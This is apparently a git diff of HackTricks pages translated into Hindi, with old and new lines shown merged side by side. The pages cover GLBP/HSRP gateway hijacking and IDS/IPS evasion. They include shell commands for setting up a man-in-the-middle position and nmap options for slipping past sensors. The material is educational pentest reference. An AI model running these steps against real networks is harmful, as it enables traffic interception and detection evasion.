- `--src`: हमले करने वाले का IP पता सेट करता है। - `--src`: हमलावर का IP पता सेट करता है।
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -1,64 +1,64 @@
# GLBP और HSRP हमले # GLBP और HSRP हमले
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।
</details> </details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure> <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %} {% embed url="https://websec.nl/" %}
## FHRP हाइजैकिंग अवलोकन ## FHRP हाइजैकिंग अवलोकन
### FHRP में अंदरूनी दृष्टि ### FHRP में अंदरूनी दृष्टि
FHRP को नेटवर्क की मजबूती प्रदान करने के लिए डिज़ाइन किया गया है जिसमें कई राउटर्स को एक एकल आभासी इकाई में मिलाया जाता है, जिससे लोड वितरण और विफलता सहनशीलता में सुधार होता है। सिस्को सिस्टम्स ने इस सुइट में प्रमुख प्रोटोकॉल जैसे GLBP और HSRP पेश किए हैं। FHRP का उद्देश्य नेटवर्क को मजबूती प्रदान करना है जिसे कई राउटरों को एक एकल आभासी इकाई में मिलाकर सुधारा जाता है, जिससे लोड वितरण और दोष सहनशीलता में सुधार होता है। सिस्को सिस्टम्स ने इस सुइट में प्रमुख प्रोटोकॉल जैसे GLBP और HSRP पेश किए हैं।
### GLBP प्रोटोकॉल की अंदरूनी दृष्टि ### GLBP प्रोटोकॉल की अंदरूनी दृष्टि
सिस्को का निर्माण, GLBP, TCP/IP स्टैक पर काम करता है, संचार के लिए UDP का उपयोग करता है जो पोर्ट 3222 पर होता है। GLBP समूह में राउटर "हैलो" पैकेट्स को 3-सेकंड के अंतराल पर आपस में विनिमय करते हैं। यदि किसी राउटर ने 10 सेकंड के लिए इन पैकेट्स को नहीं भेजा, तो उसे ऑफलाइन माना जाता है। हालांकि, ये टाइमर निर्धारित नहीं हैं और संशोधित किए जा सकते हैं। सिस्को का निर्माण, GLBP, TCP/IP स्टैक पर काम करता है, संचार के लिए UDP का उपयोग करता है पोर्ट 3222 पर। GLBP समूह में राउटर "हैलो" पैकेट्स को 3-सेकंड की अंतराल पर आदान-प्रदान करते हैं। यदि किसी राउटर ने इन पैकेट्स को 10 सेकंड के लिए नहीं भेजा, तो इसे ऑफलाइन माना जाता है। हालांकि, ये टाइमर निर्धारित नहीं हैं और संशोधित किए जा सकते हैं।
### GLBP कार्य और लोड वितरण ### GLBP कार्य और लोड वितरण
GLBP एकल आभासी आईपी के साथ कई आभासी मैक पते का उपयोग करके राउटर्स के बीच लोड वितरण को संभालता है। GLBP समूह में हर राउटर पैकेट फॉरवर्डिंग में शामिल है। HSRP/VRRP की तुलना में, GLBP कई तरीकों के माध्यम से वास्तविक लोड बैलेंसिंग प्रदान करता है: GLBP एकल आभासी आईपी के साथ कई आभासी मैक पते का उपयोग करके राउटरों के बीच लोड वितरण को संभालता है। GLBP समूह में हर राउटर पैकेट फॉरवर्डिंग में शामिल है। HSRP/VRRP की तुलना में, GLBP कई तरीकों से वास्तविक लोड बैलेंसिंग प्रदान करता है:
- **होस्ट-डिपेंडेंट लोड बैलेंसिंग:** एक होस्ट को स्थिर एवीएफ मैक पता का निर्धारण रखता है, जो स्थिर एनएटी कॉन्फ़िगरेशन के लिए आवश्यक है। - **होस्ट-डिपेंडेंट लोड बैलेंसिंग:** एक होस्ट को स्थिर एवीएफ मैक पता का निर्धारण रखता है, स्थिर एनएटी कॉन्फ़िगरेशन के लिए आवश्यक है।
- **राउंड-रॉबिन लोड बैलेंसिंग:** डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच एवीएफ मैक पता का निर्धारण बारी-बारी से करता है। - **राउंड-रॉबिन लोड बैलेंसिंग:** डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच एवीएफ मैक पता का निर्धारण बदलता है।
- **वेटेड राउंड-रॉबिन लोड बैलेंसिंग:** पूर्वनिर्धारित "वेट" मैट्रिक्स के आधार पर लोड वितरण करता है। - **वेटेड राउंड-रॉबिन लोड बैलेंसिंग:** पूर्वनिर्धारित "वेट" मैट्रिक्स के आधार पर लोड वितरण करता है।
### GLBP में मुख्य घटक और शब्दावली ### GLBP में मुख्य घटक और शब्दावली
- **AVG (सक्रिय आभासी गेटवे):** मुख्य राउटर, पीयर राउटर्स को मैक पते आवंटित करने के लिए जिम्मेदार। - **AVG (सक्रिय आभासी गेटवे):** मुख्य राउटर, सहपी राउटरों को मैक पते आवंटित करने के लिए जिम्मेदार।
- **AVF (सक्रिय आभासी फ़ोरवर्डर):** नेटवर्क ट्रैफ़िक प्रबंधित करने के लिए निर्धारित एक राउटर। - **AVF (सक्रिय आभासी फ़ोरवर्डर):** नेटवर्क ट्रैफ़िक प्रबंधित करने के लिए निर्धारित एक राउटर।
- **GLBP प्राथमिकता:** AVG को निर्धारित करने वाला मैट्रिक्स, जो डिफ़ॉल्ट रूप से 100 से शुरू होता है और 1 से 255 क होता है। - **GLBP प्राथमिकता:** AVG का निर्धारण करने वाला मैट्रिक्स, जो डिफ़ॉल्ट रूप से 100 से शुरू होता है और 1 से 255 के बीच होता है।
- **GLBP वेट:** एक राउटर पर वर्तमान लोड को प्रतिबिंबित करता है, जिसे मैन्युअल रूप से या ऑब्जेक्ट ट्रैकिंग के माध्यम से समायोजित किया जा सकता है। - **GLBP वेट:** एक राउटर पर वर्तमान लोड को प्रतिबिंबित करता है, जिसे मैन्युअल रूप से या ऑब्जेक्ट ट्रैकिंग के माध्यम से समायोजित किया जा सकता है।
- **GLBP आभासी आईपी पता:** सभी कनेक्टेड उपकरणों के लिए नेटवर्क का डिफ़ॉल्ट गेटवे के रूप में काम करता है। - **GLBP आभासी आईपी पता:** सभी कनेक्टेड उपकरणों के लिए नेटवर्क का डिफ़ॉल्ट गेटवे के रूप में काम करता है।
संवाद के लिए, GLBP ने आरक्षित मल्टीकास्ट पता 224.0.0.102 और UDP पोर्ट 3222 का उपयोग किया है। राउटर 3-सेकंड के अंतराल पर "हैलो" पैकेट्स भेजते हैं, और यदि 10-सेकंड की अवधि में कोई पैकेट छूट जाता है, तो वे गैर-परिचालनीय माने जाते हैं। संवाद के लिए, GLBP आरक्षित मल्टीकास्ट पता 224.0.0.102 और UDP पोर्ट 3222 का उपयोग करता है। राउटर 3-सेकंड की अंतराल पर "हैलो" पैकेट्स भेजते हैं, और यदि 10 सेकंड के अवधि में कोई पैकेट छूट जाता है, तो वे गैर-परिचालनीय माने जाते हैं।
### GLBP हमले की विधि ### GLBP हमले की विधि
एक हमलावता GLBP पैकेट भेजकर एक हमलावता राउटर बन सकता है जिसमें सर्वोच्च प्राथमिकता मान (255) होता है। इससे DoS या MITM हमले हो सकते हैं, जिससे ट्रैफ़िक अंतरग्रहण या पुनर्निर्देशन हो सकता है। एक हमलावर GLBP पैकेट भेजकर सर्वोत्तम प्राथमिक राउटर बन सकता है जिसमें सर्वोच्च प्राथमिकता मान (255) होता है। यह DoS या MITM हमलों का कारण बन सकता है, जिससे ट्रैफिक अंधाधुंध या पुनर्निर्देशित हो सकता है।
### Loki के साथ एक GLBP हमला करना ### Loki के साथ GLBP हमले का कार्यान्वयन
[Loki](https://github.com/raizo62/loki_on_kali) एक GLBP हमला कर सकता है जिसमें प्राथमिकता और वेट सेट किए गए होते हैं। पूर्व-हमले कदम उपकरणों का उपयोग करके वायरशार्क का उपयोग करके वर्चुअल आईपी पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मूल्यों जैसी जानकारी इकट्ठा करने की आवश्यकता होती है। [Loki](https://github.com/raizo62/loki_on_kali) एक GLBP हमला कर सकता है जिसमें प्राथमिकता और वेट सेट किए गए 255 होते हैं। पूर्व-हमले कदम उपकरणों का उपयोग करके वर्चस्व आईपी पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मूल्यों जैसी जानकारी जुटाने की जरूरत होती है।
हमले कदम: हमले कदम:
1. प्रोमिस्क्यूअस मोड पर स्विच करें और आईपी फॉरवर्डिंग सक्षम करें। 1. प्रोमिस्क्यूअस मोड पर स्विच करें और आईपी फॉरवर्डिंग सक्षम करें।
2. लक्षित राउटर की पहचान करें और उसका आईपी प्राप्त करें। 2. लक्षित राउटर की पहचान करें और उसका आईपी प्राप्त करें।
3. एक ग्रेट्यूटस ARP उत्पन्न करें। 3. एक ग्रेट्यूटस ARP उत्पन्न करें।
4. AVG का अनुकरण करते हुए एक दुर्भाग्यपूर्ण GLBP पैकेट डालें। 4. AVG का अनुकरण करते हुए एक दुर्भाग्यपूर्ण GLBP पैकेट डालें।
5. हमलावता नेटवर्क इंटरफेस को एक सेकेंडरी आईपी पता सौंपें, GLBP वर्चुअल आईपी का अभिकरण करते हुए। 5. हमलावर के नेटवर्क इंटरफेस में एक सेकेंडरी आईपी पता निर्धारित करें, GLBP आभासी आईपी का अनुकरण करते हुए।
6. पूर्ण ट्रैफ़िक दृश्यता के लिए एसएनएटी क लागू करें। 6. पूर्ण ट्रैफ़िक दृश्यता के लिए एसएनएटी क लागू करें।
7. मूल AVG राउटर के माध्यम से निरंतर इंटरनेट एक्सेस सुनिश्चित करने के लिए रूटिंग समायोजित करें। 7. मूल AVG राउटर के माध्यम से मौजूदा इंटरनेट एक्सेस सुनिश्चित करने के लिए रूटिंग समायोजित करें।
इन कदमों का पालन करके, हमलावता खुद को "मध्य में व्यक्ति" के रूप में स्थापित करता है, जो नेटवर्क ट्रैफ़िक, अक्रिप्ट या संवेदनशील डेटा सहित, को अंतरग्रहण और विश्लेषण करने में सक्षम होता है। इन कदमों का पालन करके, हमलावर खुद को "मैन इन द मिडिल" के रूप में स्थापित करता है, जो नेटवर्क ट्रैफ़िक, अक्रिप्ट या संवेदनशील डेटा सहित नेटवर्क ट्रैफ़िक को अंतर्दृष्टि और विश्लेषण करने में सक्षम होता है।
प्रदर्शन के लिए, यहाँ आवश्यक कमांड स्निपेट्स हैं: प्रदर्शन के लिए, यहाँ आवश्यक कमांड स्निपेट्स हैं:
```bash ```bash
@ -74,20 +74,20 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo route del default sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
``` ```
### HSRP हाइजैकिंग का पैशिव विवरण कमांड विवरण के साथ ### HSRP हाइजैकिंग का पैसिव विवरण एचएसआरपी के साथ कमांड विवरण
#### HSRP का अवलोकन (हॉट स्टैंडबाई राउटर/पुनरावृत्ति प्रोटोकॉल) #### HSRP का अवलोकन (हॉट स्टैंडबाय राउटर/पुनरावर्तन प्रोटोकॉल)
HSRP एक सिस्को प्रोप्राइटरी प्रोटोकॉल है जो नेटवर्क गेटवे पुनरावृत्ति के लिए डिज़ाइन किया गया है। इसकी मदद से कई भौतिक राउटर्स को एक एकल तार्किक इकाई में कॉन्फ़िगर किया जा सकता है जिसमें एक साझा आईपी पता होता है। यह तार्किक इकाई प्रमुख राउटर द्वारा प्रबंधित की जाती है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP की तरह, जो लोड बैलेंसिंग के लिए प्राथमिकता और वज़न जैसी मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक ही सक्रिय राउटर पर निर्भर है। HSRP एक सिस्को प्रोप्राइटरी प्रोटोकॉल है जो नेटवर्क गेटवे पुनरावर्तन के लिए डिज़ाइन किया गया है। इसकी मदद से कई भौतिक राउटर्स को एक एकल तार्किक इकाई में कॉन्फ़िगर किया जा सकता है जिसमें एक साझा आईपी पता होता है। यह तार्किक इकाई प्रधान राउटर द्वारा प्रबंधित की जाती है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP की तरह, जो लोड बैलेंसिंग के लिए प्राथमिकता और वज़न जैसी मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक ही सक्रिय राउटर पर निर्भर है।
#### HSRP में भूमिकाएँ और शब्दावली #### HSRP में भूमिकाएँ और शब्दावली
- **HSRP सक्रिय राउटर**: गेटवे के रूप में कार्य करने वाली डिवाइस, ट्रैफ़िक फ्लो का प्रबंधन करना। - **HSRP सक्रिय राउटर**: गेटवे के रूप में कार्य करने वाली डिवाइस, ट्रैफ़िक फ्लो का प्रबंधन करना।
- **HSRP स्टैंडबा राउटर**: एक बैकअप राउटर, जो सक्रिय राउटर की विफलता के मामले में कार्रवाई करने के लिए तैयार है। - **HSRP स्टैंडबा राउटर**: एक बैकअप राउटर, जो सक्रिय राउटर की विफलता के मामले में कार्रवाई करने के लिए तैयार है।
- **HSRP समूह**: एक एकल सहायक वर्चुअल राउटर बनाने के लिए सहयोग करने वाले राउटरों का एक सेट। - **HSRP समूह**: एक एकल प्रतिरोधी वर्चुअल राउटर बनाने के लिए सहयोग करने वाले राउटर्स का सेट।
- **HSRP MAC पता**: HSRP सेटअप में तार्किक राउटर को निर्धारित किया गया वर्चुअल MAC पता। - **HSRP MAC पता**: एचएसआरपी सेटअप में तार्किक राउटर को निर्धारित किया गया वर्चुअल MAC पता।
- **HSRP वर्चुअल आईपी पता**: HSRP समूह का वर्चुअल आईपी पता, जो कनेक्टेड डिवाइस के लिए डिफ़ॉल्ट गेटवे के रूप में कार्य करता है। - **HSRP वर्चुअल आईपी पता**: HSRP समूह का वर्चुअल आईपी पता, जो कनेक्टेड डिवाइस के लिए डिफ़ॉल्ट गेटवे के रूप में कार्य करता है।
#### HSRP संस्करण #### HSRP संस्करण
HSRP दो संस्करणों में आता है, HSRPv1 और HSRPv2, जिनमें समूह क्षमता, मल्टीकास्ट आईपी उपयोग, और वर्चुअल MAC पता संरचना में मुख्य रूप से अंतर है। प्रोटोकॉल विशेष मल्टीकास्ट आईपी पते का उपयोग सेवा सूचना विनिमय के लिए करता है, हैलो पैकेट्स हर 3 सेकंड में भेजे जाते हैं। एक राउटर को अव्याक्त माना जाता है अगर 10 सेकंड के अंतराल में कोई पैकेट प्राप्त नहीं होता है। HSRP दो संस्करणों में आता है, HSRPv1 और HSRPv2, जिनमें समूह क्षमता, मल्टीकास्ट आईपी उपयोग, और वर्चुअल MAC पता संरचना में मुख्य रूप से अंतर है। प्रोटोकॉल विशेष मल्टीकास्ट आईपी पते का उपयोग सेवा सूचना विनिमय के लिए करता है, हैलो पैकेट्स हर 3 सेकंड में भेजे जाते हैं। एक राउटर को अव्याक्त माना जाता है अगर 10 सेकंड के अंतराल में कोई पैकेट प्राप्त नहीं होता है।
#### HSRP हमले की तंत्रिका #### HSRP हमले की विधि
HSRP हमले में सक्रिय राउटर की भूमिका को ज़बरदस्ती से अधिक प्राथमिकता मान कर लेना शामिल है। यह एक मैन-इन-द-मिडिल (MITM) हमले की ओर ले जा सकता है। महत्वपूर्ण पूर्व-हमले कदमों में HSRP सेटअप के बारे में डेटा जुटाना शामिल है, जो ट्रैफ़िक विश्लेषण के लिए वायरशार्क का उपयोग करके किया जा सकता है। HSRP हमले में सक्रिय राउटर की भूमिका को ज़बरदस्ती अधिकतम प्राथमिकता मान कर लेना शामिल है। यह एक मैन-इन-द-मिडिल (MITM) हमले की ओर ले जा सकता है। महत्वपूर्ण पूर्व-हमले कदम एचएसआरपी सेटअप के बारे में डेटा जुटाना है, जो ट्रैफ़िक विश्लेषण के लिए वायरशार्क का उपयोग करके किया जा सकता है।

View file

@ -1,71 +1,73 @@
{% hint style="success" %}
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
# **TTL मैनिपुलेशन** # **TTL मैनिपुलेशन**
कुछ पैकेट भेजें जिनका TTL IDS/IPS तक पहुंचने के लिए पर्याप्त हो, लेकिन अंतिम सिस्टम तक पहुंचने के लिए पर्याप्त न हो। और फिर, उन्हीं सीक्वेंस के साथ एक और पैकेट भेजें ताकि IPS/IDS सोचेगा कि वे दोहराव हैं और उन्हें जांचेगा नहीं, लेकिन वास्तव में वे दुरुपयोगी सामग्री ले जा रहे हैं। कुछ पैकेट भेजें जिनका TTL IDS/IPS तक पहुंचने के लिए पर्याप्त हो, लेकिन अंतिम सिस्टम तक पहुंचने के लिए पर्याप्त न हो। और फिर, उन्हें दूसरे पैकेट भेजें जिनकी सीक्वेंस उन अन्य पैकेटों के समान हो ताकि IPS/IDS यह सोचें कि वे दोहराव हैं और उन्हें जांचेंगे नहीं, लेकिन वास्तव में वे दुष्ट सामग्री ले जा रहे हैं।
**Nmap विकल्प:** `--ttlvalue <मान>` **Nmap विकल्प:** `--ttlvalue <मान>`
# हस्ताक्षरों से बचें # हस्ताक्षरों से बचें
पैकेट में कचरा डेटा जोड़ें ताकि IPS/IDS हस्ताक्षर को टाल ें। पैकेट में कचरा डेटा जोड़ें ताकि IPS/IDS हस्ताक्षर को टाल सकें।
**Nmap विकल्प:** `--data-length 25` **Nmap विकल्प:** `--data-length 25`
# **विभाजित पैकेट्स** # **विभाजित पैकेट्स**
पैकेट को विभाजित करें और भेजें। यदि IDS/IPS को उन्हें पुनर्गठित करने की क्षमता नहीं है, तो वे अंतिम होस्ट तक पहुंचेंगे। पैकेट को विभाजित करें और उन्हें भेजें। यदि IDS/IPS को उन्हें पुनर्गठित करने की क्षमता नहीं है, तो वे अंतिम होस्ट तक पहुंचेंगे।
**Nmap विकल्प:** `-f` **Nmap विकल्प:** `-f`
# **अमान्य** _**चेकसम**_ # **अमान्य** _**चेकसम**_
सेंसर आम तौर पर प्रदर्शन कारणों के लिए चेकसम की गणना नहीं करते। इसलिए एक हमलावर एक पैकेट भेज सकता है जो **सेंसर द्वारा व्याख्या किया जाएगा लेकिन अंतिम होस्ट द्वारा अस्वीकृत किया जाएगा।** उदाहरण: सेंसर्स सामर्थ्य कारणों के लिए चेकसम की गणना नहीं करते हैं। इसलिए एक हमलावर एक पैकेट भेज सकता है जो सेंसर द्वारा व्याख्या किया जाएगा लेकिन अंतिम होस्ट द्वारा अस्वीकृत किया जाएगा। उदाहरण:
एक पैकेट भेजें जिसमें RST फ्लैग और एक अमान्य चेकसम हो, ताकि फिर, IPS/IDS यह सोच सकता है कि यह पैकेट कनेक्शन बंद करने जा रहा है, लेकिन अंतिम होस्ट चेकसम अमान्य होने के कारण पैकेट को खारिज कर देगा। एक पैकेट भेजें जिसमें RST फ्लैग और एक अमान्य चेकसम हो, तो फिर, IPS/IDS यह सोच सकते हैं कि यह पैकेट कनेक्शन बंद करने जा रहा है, लेकिन अंतिम होस्ट चेकसम अमान्य होने के कारण पैकेट को खारिज कर देगा।
# **असामान्य IP और TCP विकल्प** # **असामान्य आईपी और TCP विकल्प**
एक सेंसर संभावित है कि IP और TCP हेडर्स के भीतर निर्दिष्ट ध्वज और विकल्पों वाले पैकेट्स को नजरअंदाज करेगा, जबकि गंतव्य होस्ट पैकेट को प्राप्त करने पर स्वीकार करेगा एक सेंसर ऐसे आईपी और TCP हेडर्स के भीतर निर्धारित ध्वज और विकल्पों वाले पैकेट्स को नजरअंदाज कर सकता है, जबकि गंतव्य होस्ट पैकेट को प्राप्त करने पर स्वीकार करता है
# **ओवरलैपिंग** # **ओवरलैपिंग**
संभावना है कि जब आप एक पैकेट को विभाजित करते हैं, पैकेटों के बीच किसी प्रकार का ओवरलैपिंग हो (शायद पैकेट 2 के पहले 8 बाइट पैकेट 1 के आखिरी 8 बाइट के साथ ओवरलैप होता है, और पैकेट 2 के आखिरी 8 बाइट पैकेट 3 के पहले 8 बाइट के साथ ओवरलैप होता है)। फिर, यदि IDS/IPS उन्हें एक अलग तरीके से पुनर्गठित करता है जैसा कि अंतिम होस्ट, तो एक भिन्न पैकेट का व्याख्यान होगा।\ संभावना है कि जब आप एक पैकेट को विभाजित करते हैं, पैकेटों के बीच कुछ प्रकार का ओवरलैपिंग हो (शायद पैकेट 2 के पहले 8 बाइट पैकेट 1 के आखिरी 8 बाइट के साथ ओवरलैप होता है, और पैकेट 2 के आखिरी 8 बाइट पैकेट 3 के पहले 8 बाइट के साथ ओवरलैप होता है)। फिर, यदि IDS/IPS उन्हें अलग-अलग तरीके से पुनर्गठित करता है, तो एक भिन्न पैकेट व्याख्या किया जाएगा।\
या शायद, 2 पैकेट्स जिनका समान ऑफसेट है आते हैं और होस्ट को यह निर्णय लेना होता है कि वह किसे लेता है। या शायद, 2 पैकेट्स एक ही ऑफसेट के साथ आते हैं और होस्ट को यह निर्णय लेना होता है कि वह किसे लेता है।
* **BSD**: यह पैकेट्स के लिए छोटे _ऑफसेट_ वाले पैकेट्स की प्राथमिकता रखता है। समान ऑफसेट वाले पैकेट्स के लिए, यह पहला चुनेगा। * **बीएसडी**: यह पैकेट्स के छोटे _ऑफसेट_ वाले पैकेट्स की प्राथमिकता रखता है। एक ही ऑफसेट वाले पैकेट्स के लिए, यह पहला चुनेगा।
* **Linux**: BSD की तरह, लेकिन यह अंतिम पैकेट को अधिक पसंद करता है जिसका समान ऑफसेट है। * **लिनक्स**: बीएसडी की तरह, लेकिन यह अंतिम पैकेट को अधिक पसंद करता है जिसमें एक ही ऑफसेट है।
* **पहला** (Windows): जो मान आता है, वह मान रहा है। * **पहला** (विंडोज): जो मान पहला आता है, वह मान बना रहता है।
* **अंतिम** (सिस्को): जो मान आता है, वह मान रहा है। * **अंतिम** (सिस्को): जो मान अंतिम आता है, वह मान बना रहा है।
# उपकरण # उपकरण
* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
{% hint style="success" %}
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
